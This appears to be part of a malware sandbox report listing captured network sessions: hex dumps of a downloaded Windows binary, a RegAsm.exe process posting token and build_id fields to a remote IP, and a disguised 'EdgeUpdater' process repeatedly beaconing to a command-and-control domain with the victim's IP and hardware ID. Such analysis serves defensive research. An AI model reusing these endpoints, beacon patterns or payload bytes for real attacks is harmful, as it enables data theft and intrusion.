2024-10-02 07:43:16 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-10-02 07:43:16 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-10-02 07:43:16 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-10-02 07:43:16 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-10-02 07:43:17 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-10-02 07:43:17 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-10-02 07:43:17 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-10-02 07:43:18 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49875	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:19 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:19 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="token"e378ac99d592dbd707a2cc87239eab0e------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------ECBGHCGCBKFIECBFHIDGCont
2024-10-02 07:43:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:19 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49877	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:24 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:43:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:24 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:43:25 UTC	615	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3%2FJ%2B7aiaSRI6UQonHdHUsHW%2Bhy4rillcWSUM8pRTWvuhLi6PRYTpiJYuYHaPQekH8chs8%2BUwFaFve%2FtjC%2FG5Z1gZvOjeVuRRxjnTusEUY9gA5M1sXUYi%2BIv5gEjA2NheQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30fb4283c43b7-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49879	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:26 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:26 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:43:26 UTC	609	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyHTFWJVkEixxG0AkcyA71rez8CJmdV3DiJgmG6X6MdwRm73mWtKNua8yzhRYF%2B6Pnk5o5%2FQOB%2Fr6CJy58B%2FWNBCkYie7nxVUrSNNkuKAsAdN6V16PKMKIM6HrHjQgMw0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30fbcacdac3f0-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49881	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:27 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:27 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:43:27 UTC	603	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YqwWwez41MxUTdSdtDaPrPVptGeWJcXaXenhROkr34auViXFlMvtGAX3by2h4XyVZpo8tDkP21%2FbpqxmUW0OMVV4t0XkwReoxM6DOwH1N8i6IUEMA3MtskR6EfoGKGNJCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30fc59a7f0c80-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49882	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:33 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:43:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:33 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:43:33 UTC	613	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESC6Gn4BsYthnJcRvPl5mbqzDc%2BGL6UGQPmXHE3lurxKkk%2FP%2B%2FRZChBKWLinmm0Uch5CDMwW0RlDWMru9vQSkgiUP8ou77%2FqOY%2FUwGIwOM3YluDBvySLTldMVn50rzNtQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30feb19920fab-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49884	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:34 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:34 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:43:35 UTC	609	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmw3auvQjCJiPbfUQ5m%2FikZFakEn%2F0ggiFCaoV6QIHpUL57FQ1gyxuX%2B10QenM7Gd73p%2FQMGfvKGhQuzzUqVZTTnINW6f1HWp4QAUoeXIx8uGt9p8qbRQ53rCVAKqG2qZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ff30d0d8c4b-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49886	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:36 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:37 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:43:37 UTC	607	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftrhBjjyxO9ozfTbYaxGRSYVXQqw%2FXBcdxI0uQqFcx%2BHZ8smjSkbHDhg4Ys5dXFyigBnJAvNyueVshwqzxlm6UT5SMY3V83xwDfZVGUlyRZOoG5rlSJ8yvaT%2BMTPapUkqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc31000d99e32f4-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49887	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:08 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:44:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:08 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:44:08 UTC	605	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSW5D96l4GqwMnmsgmXyzlIvRoIrVs3DeEhBFJJ8ocEdCFIqKP9lzoi9GrZs8cgO%2BpByQUlZSx1zUsQmzq9fBidEVAFj8%2FUBY4B4S1LRyH41G9KP84bxIcNnpz9OhANmjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc310c2dfc01962-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49889	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:09 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:09 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:44:09 UTC	611	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hghwKzH9iFj%2BsJOtIxoFTJmcWlMCjs%2FLLWp5HhQsADQZ%2BThMJSiycXK2eLBu07Y7lCXR2QYCPIe5OdFxpsfAJjh%2FBkJAG6uTdaQAUmW%2FFzoI2b4Q5uAVqblOGfPREeP2LQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc310cb8cad0f60-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49891	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:11 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:11 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
